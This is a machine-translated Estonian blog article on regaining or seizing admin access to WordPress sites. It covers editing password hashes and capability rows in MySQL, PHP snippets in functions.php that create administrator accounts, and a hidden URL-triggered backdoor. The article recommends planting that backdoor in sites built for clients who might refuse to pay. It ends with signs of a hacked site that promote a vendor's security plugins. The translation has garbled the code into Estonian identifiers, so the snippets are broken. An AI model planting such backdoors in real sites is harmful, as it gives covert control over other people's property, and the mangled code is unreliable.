Kuidas häkkida WordPressi veebisaidile, täielik juhend

Kuidas siseneda WordPressi veebisaidile, täielik juhend


Me ei anna luba, kiida heaks ega julgusta ebaseaduslikku ega pahatahtlikku käitumist! Selle artikli eesmärk on selgitada, kuidas häkkida või taastada juurdepääs teile kuuluvale WordPressi saidile või mida teil on redigeerimise, administraatori ja juurdepääsu õigused. Ükskõik, mida teete, teete seda ise. Me ei vastuta teie tegevuse eest. See juhend töötab ainult hariduslikel eesmärkidel.

Kirjeldatud meetodid aitavad teil saidile juurde pääseda isegi siis, kui teil enam kontot pole, kuid see nõuab saidi kohta pisut teavet ja need ei aita teil siseneda WordPressi juhuslikku installimisse.

Selles juhendis näitame teile kohe järgmist:

  • Kuidas häkkida WordPressi veebisaidile
  • Kuidas luua WordPressis tagauks?
  • Kuidas FTP kaudu uut kasutajakontot luua?
  • 10 märki teie WordPressi saidi häkkimise kohta

Kuidas siseneda WordPressi veebisaidile, täielik juhend

Olukorrad, milles saate iseennast aidata

Kui olete ühes järgmistest olukordadest, aitavad meie meetodid juurdepääsu taastada:

  • unustasite kasutajanime või e-posti aadressi
  • parooli lähtestamise võimalus hostiserveris ei tööta
  • parooli lähtestamise e-kirju ei tule läbi
  • teil pole enam juurdepääsu konto e-posti aadressile
  • teate kasutajanime ja parooli, kuid kombinatsioon lihtsalt ei tööta

Allpool kirjeldatud meetodite kasutamiseks on vaja ainult üks järgmistest:

  • FTP-juurdepääs serverile või
  • cPaneli juurdepääs serverile või
  • juurdepääs MySQL-i andmebaasile ja võimalus sellega eemalt ühenduda

Meetod nr 1 – MySQL-viis

Kasutage seda meetodit olemasoleva kasutaja parooli (või vajaduse korral kasutajanime) muutmiseks või uue konto loomiseks. Teil on vaja cPaneli juurdepääsu või otsest MySQL-i juurdepääsu saidi andmebaasile. Alustame olemasoleva kasutaja parooli muutmisega.

Kui kasutate cPaneli, siis logige sisse (cPanelile pääseb alati juurde saidil https://yoursite.com:2083 link), otsige üles ja avage phpMyAdmin. Vasakul on andmebaaside ja tabelite loetelu. Otsite tabelit, mis lõppeb _kasutajad. Tõenäoliselt saab olema wp_kasutajad, aga kui teil on serverisse installitud mitu WordPressi saiti, peate leidma selle õige.

Parempoolses tabelis on kasutaja, keda soovite redigeerida. Kui ühendate MySQL-iga mõne välise kliendi kaudu, järgige sama protseduuri SQLyog. Kui olete tabeli ja tegeliku kasutaja kirje üles leidnud, on aeg parool vahetada.

Nagu olete juba praeguseks aru saanud, salvestatakse parool kausta kasutaja_pass väli, räsitud MD5 algoritmi abil. Ava veebipõhine MD5 generaator sisestage kasutatav parool ja klõpsake nuppu „Räsimine“. Kopeerige loodud string ja asendage algne parool sellega. Rakenduses phpMyAdmin saate välja muuta, topeltklõpsates sellel. Protseduur on sarnane ka teiste MySQL-i klientidega. Salvestage muudatused ja logige WordPressi sisse oma uue parooliga.

WP kasutajate tabel

Kasutajanimi, räsitud parool ja e-kirjad salvestatakse kausta wp_kasutajad andmebaasi tabel

Ikka meetodil nr 1 – uue kasutaja loomine

Uue kasutaja loomine on natuke keerulisem, kuid siiski vähem kui minutiga hallatav. Looge uus kirje kasutajate tabelis ja asustatud: kasutaja_logi, kasutaja_pass (räsitud, kasutades ülalkirjeldatud MD5 funktsiooni) ja kasutaja_post. Kõik muud väljad võivad jääda tühjaks; neil pole vahet. Salvestage uus rekord. Pärast salvestamist annab MySQL sellele kordumatu ID. See on number väljal ID. Mäleta seda.

Nüüd mine _usermeta laud. Pidage meeles, tabeli eesliide peab olema sama, mis kasutajate eesliide. Näiteks wp_kasutajad ja wp_usersmeta. Kui eesliide pole sama, redigeerite vale (mõne muu WP installimise) tabelit ja uus konto ei tööta. Loome kaks uut plaati. Ignoreeri umeta_id väli mõlemale. Komplekt kasutaja ID väljale väärtuse, mida just mäletasite (uus ID väärtus kasutajate tabelis). Esimese plaadikomplekti jaoks meta_key kuni wpct_user_level ja meta_väärtus kuni 10. Teise jaoks meta_key kuni wpct_capacities ja meta_väärtus kuni a: 1: {s: 13: "administraator"; b: 1;}. Salvestage mõlemad. Olete valmis – sisselogimine!

Meetod nr 2 – funktsioonid.php viisil

Seda lähenemisviisi saab kasutada funktsioonideph.php redigeerimisel cPaneli kaudu või FTP-kliendi kasutamisel. CPaneli kasutamisel leidke failihaldur ja avage see. Esiteks peame leidma aktiivse teema kausta.

Minema public_html / wp_content / themes kausta. Kui näete kohe oma teemat ja teate, milline see on – suurepärane. Avage selle kaust ja alustage redigeerimist funktsioonid.php. Kui ei, avage sait, paremklõpsake ükskõik kus ja valige „Vaata allikat”. Seejärel vajutage Ctrl + F ja alustage tippimist /teemad/ varsti on teil esile tõstetud palju URL-e ja tunnete ära aktiivse teema kausta nime.

Leidke see failistruktuurist, avage ja alustage redigeerimist funktsioonid.php. Kopeerige / kleepige järgmine kood faili lõppu. Pidage meeles sulgemist ?> PHP-sildid, kui teil need on. Nad peavad olema viimasel real. Sisestage kood enne neid.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! kasutajanimi_eksisteerib ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (massiiv ('ID' => $ user_id, 'hüüdnimi' => $ new_user_email));

$ user = new WP_User ($ user_id);
$ user-> set_role ('administraator');
}

Uue konto kajastamiseks muutke ainult koodi kahte esimest rida. Kui WP-s on juba selle e-kirjaga kasutaja, siis uut kontot ei looda, nii et veenduge, et see oleks uus. Muutke ka parool – ärge sattuge skriptide kiddy alla. Pärast faili salvestamist avage lihtsalt oma sait, kood käivitatakse, luuakse uus konto administraatori õigustega ja saate sellega sisse logida.

Pärast seda ärge unustage kustutada koodi kaustast funktsioonid.php.

Muud häkkimismeetodid

FTP, cPaneli või MySQL parooli tundmisega tõendate, et teil on seaduslik juurdepääs serverile ja seetõttu peaks teil olema juurdepääs ka WordPressi installidele. Kui teil pole neid kontosid, siis pole teil midagi head (teiste inimeste saitidele häkkimine) ja see pole tore!

Pidage meeles, et volitamata juurdepääsu saamine arvutitele, saitidele või serveritele on raske kuritegu ja sellega tegeldakse enamikus riikides kiiresti.

Kui te kardate, et teie WordPressi saiti saab häkkida, siis kontrollige seda lehte tasuta WordPressi turvaskanneriga. Kui teil pole aega oma ajaveebi seadistada, lubage meil seda teie heaks teha.

Kuidas luua WordPressis tagauks?

Kui välisuks on suletud, võiksite proovida tagaukse. See võib tunduda pahatahtlik viis kasutada koodi saidile sisenemiseks ilma, et sellele juurde pääseks, kuid tegelikult on aeg, kus peate oma saidi juhtima, kui keegi selle varastas..

Kui see loob teistele inimestele veebisaite, mida te teete, siis varem või hiljem tuleb klient, kes keeldub teile teie töö eest maksmast; klient, kes kustutab teie sisselogimisandmed ja võtab üle kontrolli kogu teie poolt. Mõnikord piisab uue kasutaja loomisest FTP kaudu või parooli lähtestamisest. Kui sellest ei piisa, võiksite tagasi pöörduda või luua tagaukse juurdepääsu oma administraatori lehtedele.

Kuid kui otsustasite oma WordPressi keskkonnas väikese kooditüki peita, võite salvestada endale teatud väärikuse ja pääseda juurde WordPressi saidile administraatori õigustega. Ja just sealt algabki mäng.

Pole tähtis, mitu korda see varas teie teabe kustutab või varukoopia serveris, mida ta tõenäoliselt omab, on tõenäoline, et ta ei tea tagaukste sissepääsude kohta midagi. Kui ta seda teeks, poleks tal tõenäoliselt WordPressi seadistamisel isegi teie abi vaja, eks?

Tagaukse loomine:

OK, jutuga piisavalt; töö lõpuleviimiseks peate sisestama koodi:

  1. Avage fail function.php
  2. Kopeeri / kleebi järgmine kood:
  3. add_action ('wp_head', 'wploop_backdoor');
    funktsioon wploop_backdoor () {
    If ($ _GET ['tagauks'] == 'knockknock') {
    nõuda ('wp-sisaldab / registreerimine.php');
    If (! Kasutajanimi_existeerib ('kasutajanimi')) {
    $ user_id = wp_create_user ('nimi', 'pass');
    $ user = new WP_User ($ user_id);
    $ user-> set_role ('administraator');
    }
    }
    }
    ?>
  4. Salvesta muudatused

Kui jätate koodi selliseks, nagu see on, peate kõik saidil uue administraatori loomiseks tegema, kui külastate http://www.oma domeen.com/?backdoor=knockknock

Pärast lehe laadimist on teie uus kasutajanimi “Nimi” ja parool “üle andma”.

Muidugi, saate seda koodis muuta ülal, muutes ‘nimi’ ja ‘pass’ mis iganes sa tahad. Saate muuta ka oma tagaukse linki, muutes „tagauks” ja / või „koputus” kõigeks, millega kokku puutute.

Proovige funktsiooni – see pole mitte ainult lõbus, vaid võib ka tulevikus teid aidata, kui loote veebisaidi kellegi jaoks, keda te ei saa täielikult usaldada. Samuti peaksite oma WordPressi ja blogimisoskusi tasandama.

Kuidas FTP kaudu uut kasutajakontot luua?

Uute kasutajakontode loomine WordPressis on väga lihtne. Administraatorina peate liikuge lehele Kasutajate administraator kus saate luua uue konto mis tahes kasutajarollide jaoks. Seda saab teha mõne sekundi jooksul ja vastloodud kasutaja saab antud kasutajanime ja parooliga kohe sisse logida.

Mis juhtub, kui kaotate juurdepääsu oma WordPressi administraatorile? Asjad võivad minna pisut keerukamaks, kuid ärge muretsege – meil on teie jaoks funktsioon, mis võib päästa teie administraatori elu.

Kui mõni muu administraator kustutas teie konto, kas olete kustutanud ekslikult kõik kasutajad andmebaasist, kas kasutanud rikkega pistikprogrammi või häkkinud, saate ikkagi kontrolli alla saada. Mõnikord võib teil olla juurdepääs ainult oma FTP-serverile, kui HTTP pole teie käeulatusest väljas ja peate looma uue administraatori. Ehkki see võib olla harv juhtum, säästab järgmine funktsioon teid.

Uue konto loomiseks väljaspool WordPressi administratiivset keskkonda, kõik, mida vajate, on FTP-juurdepääs teie saidile. Administraatorina peaks teil oma serverisse sisselogimiseks olema kogu vajalik teave ja teemast uue funktsiooni luues saate kiiresti luua uue konto..

Uue kasutajakonto loomine FTP kaudu:

  1. Avage FTP klient ja looge ühendus oma kontoga
  2. Liikuge wp-sisu / teemade juurde
  3. Avage kasutatava teema kaust
  4. Otsige faili function.php ja redigeerige seda
  5. Kopeerige ja kleepige järgmine funktsioon:
  6. funktsioon admin_account () {
    $ user = 'Kasutajanimi';
    $ pass = 'parool';
    $ email = '[email protected]';
    if (! kasutajanimi_eksisteerib ($ kasutaja) &&! email_eksisteerib ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = new WP_User ($ user_id);
    $ user-> set_role ('administraator');
    }}
    add_action ('init', 'admin_account');
    
  7. Muutke kasutajanimi, parool ja e-posti aadress midagi unikaalset
  8. Salvesta muudatused

Veenduge, et funktsioonis määratud kasutajanimi, parool ja e-posti aadress oleks kordumatud vastasel juhul ei tööta see funktsioon korralikult. Kui olete muudatused salvestanud, olete kõik teinud ja saate liikuda oma WP sisselogimispaneelile. Kasutage uuesti sisselogimiseks uut teavet ja kui olete konto kinnitanud, saate selle funktsiooni failist function.php kustutada.

Ülaltoodud funktsioon loob administraatori konto, kuid saate seda hõlpsalt muuta, et luua konto mõne muu kasutajarollis. Lihtsalt muutke rolli 8-lth rida koodi redigeerijale, autorile, kaasautorile, tellijale või muule teie loodud kasutajarollile.

Kahjuks, kui olete kaotanud oma administraatori konto, olete kaotanud ka kõik selle kasutajanime alla kirjutatud postitused. Sellepärast peaksite alati hoidma varukoopia, mille saate hõlpsalt hankida. Kui loete seda oma administraatori konto omamise ajal, võtke seda meeldetuletusena kohe varukoopia loomiseks ja lisage see artikkel järjehoidjatesse igaks juhuks, kui peate tulevikus looma konto väljaspool WordPressi.

10 märki teie WordPressi saidi häkkimise kohta

WordPress on tohutu ajaveebiplatvorm. Kasutajaid on miljoneid ja tundub, et arv kasvab iga päevaga kiiresti. Inimesed kipuvad isegi teistes sisuhaldussüsteemides loodud veebisaite sellesse avatud lähtekoodiga süsteemi üle kandma sagedamini, kui võite arvata. Ja kuigi see on hea, tähendab see seda Häkkerid paigutavad ka WordPressi juhuslike saitide sissetungimisel arvukate punktide hulka.

Tavaliselt saab häkkimise korral sellest kohe teada. Teie sait muutub juurdepääsematuks; te ei saa sisse logida ja mõnikord jätab häkker isegi avalehele teate. Kuid sagedamini kui mitte, te ei pruugi isegi märgata, et midagi on muutunud. Selle artikli osas näitame teile mitmeid märke, mis võivad näidata, et teie WordPressi saiti on häkkinud, ja mõnda probleemi lahendust.

1. Ebaõnnestunud sisselogimine

See märk on üsna ilmne. Kui olete mõnda aega kasutajanime ja parooli kombinatsiooni kasutanud, ilma et teil kunagi probleeme oleks, võite kahtlustada, kui äkki WordPress teie kontot ei tunne. Kui häkker pidi teie saidile sisse logima, on tõenäoline, et ta muudab teie administraatoriõigusi kiiresti.

Võib-olla tuli ta muuta teie parooli või kustutada teie konto täielikult. Enne kui hakkate paanitsema pärast seda, kui WordPress teile esimest korda vale kasutajanime / parooli kohta teateid annab, kaaluge asjaolu, et olete võinud sisestada vale kombinatsiooni või lülitada sisse suurtähelukk.

Lahendus: Proovige parool e-posti teel taastada või kasutage uuesti sisselogimiseks mõnda muud kontot. Sisselogimise turvalisuse tagamiseks soovitame installida Logi sisse Ninja plugin WordPressile.

2. Teie saidile lisatakse pahatahtlik sisu

Sait sisaldab pahavarahoiatust

Kui hakkate oma saidil harjumatu sisu märkama, võite hakata muretsema. Kui nad saavad võimaluse pääseda juurde teie administraatorialale, häkkerid saavad muuta teie tuuma ja nii teie teema- kui ka pistikfaile. See tähendab, et nad saavad muuta kõike, mida nad tahavad.

Ehkki mõned häkkerid muudavad teie saidi ilmet järsult ja võivad isegi öelda, et häkkisite teid, on teised selle kohta palju peenemad..

Lahendus: Proovige veebisaidi koodist otsida peidetud sisu. Teie saidi jalusesse võivad olla lingid pahatahtlike saitide häkkeritele või on nad installinud hüpikaknad, mis avanevad teie klientidele regulaarselt. Kasutage saidi Security Ninja abil oma saidi skannimist või selliste probleemide pidevat jälgimist.

3. Kahtlased külastused

Kui te ei jälgi oma veebisaiti, peaksite seda kohe tegema. Lihtne viis selleks on Google Analyticsi kasutamine, mis paljude muude funktsioonide hulgas võib öelda, kui palju külastusi saate ja kust need külastused tulevad. Mõne aja pärast saate oma veebisaidiga tuttavaks. See tähendab, et teate, kust tulevad visiidid, teate uue kampaania käivitamisel ja kui looduses on väljas uued reklaamilingid.

Kuid kui märkate äkki, et teie sait saab kahtlasest domeenist tohutult palju uusi külastusi, soovite seda lähemalt uurida, kuna teie saiti võidakse lihtsalt häkkida. Tavaliselt annab selline külastus 100% -lise põrkumismäära, mis tähendab, et pääses ainult ühele lehele. Häkkerid kasutavad sageli automatiseeritud süsteeme, mis viivad muud halvad saidid teie omadele. Olgu halb kood, mis teie saidil täidetakse, või olete muutunud rämpspostivõrgu osaks, asjad võivad muutuda tõsiseks ja peate oma saiti pahatahtliku koodi osas kontrollima.

Lahendus: Kasutage Google Webmasters Tools kahtlaste domeenide leidmiseks

4. Liikluse järsk langus

Saidi oleku ohutu sirvimine

Erinevalt viimati mainitud häkkimisest, võib see märku anda, kuna külastuste arv on järsku langenud. Selle asemel, et teile uutele visiitidele viidata, häkker võib saata külastusi teie saidilt eemal. See võib juhtuda, kuna häkker suunas teie saidi teisele saidile. Teine põhjus vähem külastajaid saada on see, et Google lisab teie saidi musta nimekirja. See toiming näitab sõnumit kõigile kasutajatele, kes võivad teie saiti nakatamata jätta.

Lahendus: Kasutage Google’i Saidi ohutu sirvimise olek et kontrollida, kas teie sait on märgitud ohtlikuks ja seda on praegu ohtlik külastada.

5. Otsimootorite tulemused on kummalised

Kui te pole oma saidil muudatusi märganud, kuid leiate siiski, et Google’i ja teiste otsingumootorite otsingutulemid on kummalised (kuvatakse erinevaid pealkirju ja muid metaandmeid), võib see olla häkkinud saidi selge märk. Häkker võis teie sisu muuta viisil, mis on nähtav ainult asjatundjatele. Sellegipoolest oleks muudatus nähtav otsingumootori tulemustes.

Lahendus: Kontrollige oma saiti Google Webmasters Tools, ja kontrollige, kas teie saiti on sellega häkitud tasuta veebitööriist.

6. Meilisõnumeid ei saa saata ega vastu võtta

Kui häkker pääseb teie saidile juurde, soovib ta seda tõenäoliselt kasutage oma serverit kõigi teiste rämpspostitamiseks. Kui saate teada, et te ei saa oma WordPressist uusi e-kirju saata ega vastu võtta, võib see olla selge märk häkkimisest. Kontrollige oma e-posti veelkord ja kontrollige seda siis teenusepakkujalt, et veenduda, et selles pole vigu.

Lahendus: Testige oma WordPressi posti funktsioon selle tasuta pistikprogrammiga.

7. Saiti pole olemas

serverit ei leitud

Mõnikord ei pääse häkkerid teie saidile pahatahtliku koodi istutamiseks, kasutajate ümbersuunamiseks ega teie e-posti kasutamiseks rämpspostiks. Mõnikord, kõik, mida nad teha tahavad, on teie saidi krahh. Harva kustutab häkker kõik serverist edukalt. Sellepärast on oluline, et hostite oma faile tuntud hostimisettevõttes, kes hoolitseb turvalisuse eest ja hoiab ka teie veebisaidi iga päev või vähemalt kord nädalas varukoopiaid. Hea tava on, et teete aeg-ajalt ka oma varukoopiaid, et saiti saaks kiiresti taastada.

Lahendus: Installige WordPressi üks parimatest varunduse halduse pistikprogrammidest.

8. Kahtlased failid

Sarnane pahatahtliku sisuga, mida võidakse olemasolevatele failidele lisada, häkker võib istutada lisafaile ükskõik kuhu teie juurkausta. Hea on teada saada oma tee WordPressi ümber, kuid kui te pole veel nii kogenud, peaks teie käsutuses olema turvariist, mis saab kontrollida kõiki teie faile ja tegevusi. Hiljuti vaatasime üle turvaninja, mis on ideaalne vahend kõigi teie WordPress-failide kontrollimiseks.

Lahendus: Proovige otsida faile, mis ei kuulu teie WordPressi installi. Kasutage rakendust Security Ninja, et oma saiti regulaarselt skannida ja need failid automaatselt üles leida. Seejärel kustutage failid või eemaldage pahatahtlik kood nakatunud failidest. Ärge unustage Security Ninja pistikprogrammi Core Scanner.

9. Uued liikmed

Sõltuvalt teie saidist võite olla ainus, kes suudab uusi liikmeid lisada. Sel juhul võib äratuse käivitada e-kiri, mis annab teile teada värskelt registreeritud kasutajatest. Kui on ka teisi administraatoreid, kellel on võimalus uusi liikmeid lisada, uurige nendelt kahtlast tegevust.

Lahendus: Muutke sisselogimise URL-i tasuta pistikprogrammiga, piirake juurdepääsu oma WordPressi sisselogimislehele, kasutades .htpasswd-faili, ja kasutage sisselogimisvormi kaitsmiseks kogu aeg Login Ninjat.

10. Vaadake oma serveris ajastatud sündmusi

Mõnikord ei tee häkker teie veebisaidile midagi, kui ta on sinna tee leidnud. Selle asemel, nad lahkuvad plaanitud üritustest mis võib tulevikus teie saiti kahjustada. See tehnika on ohtlik, kuna häkker võib kogenematu ohvri alguses abita jätta. Võite olla nakatunud ega tea sellest midagi.

Lahendus: Kontrollige oma CRON-i töid teie kasutatavas serveris ja veenduge, et pole kahtlaseid ajastatud toiminguid.

Pakkimine üles

Loodame, et see artikkel aitab teil hallata isegi turvalisemat WordPressi saiti ja aitab teil halbades olukordades sellele juurde pääseda. Ja isegi kui teie sait on puhas, ärge võtke seda iseenesestmõistetavana.
Veenduge alati, et teie ajaveeb oleks võimalikult turvaline. Soovitame WordPressi jaoks turbe pluginaid, mis võivad teid kõige rohkem säästa. Siiski ärge kasutage ohtlikku parooli ja olge oma WordPressi saidile häkkimisel ettevaatlik.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Liked Liked